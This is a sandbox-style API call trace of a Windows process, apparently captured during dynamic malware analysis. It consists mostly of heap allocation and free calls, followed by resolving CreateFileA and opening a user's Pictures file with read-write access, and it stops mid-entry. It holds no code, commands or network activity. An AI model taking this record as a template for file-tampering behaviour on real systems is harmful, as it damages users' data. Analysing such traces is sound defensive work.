HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.651] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0190.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0190.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0190.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0190.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.652] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0190.652] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.653] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.653] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.654] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.654] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.655] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd768 [0190.655] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd768, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.655] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.655] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.655] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd768 [0190.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd768, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0190.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.656] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0190.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0190.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", cchWideChar=81, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 81 [0190.656] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x51) returned 0x8c4a48 [0190.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", cchWideChar=81, lpMultiByteStr=0x8c4a48, cbMultiByte=81, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp", lpUsedDefaultChar=0x0) returned 81 [0190.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0190.657] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.657] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\rcum7ulgy1kxh5mcjre6.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0190.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0190.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.657] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0190.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=81, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa2) returned 0x8fcbc0 [0190.658] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=81, lpWideCharStr=0x8fcbc0, cchWideChar=81 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\rcuM7uLGY1kXH5mCjrE6.bmp") returned 81 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.658] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.658] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0190.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0190.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 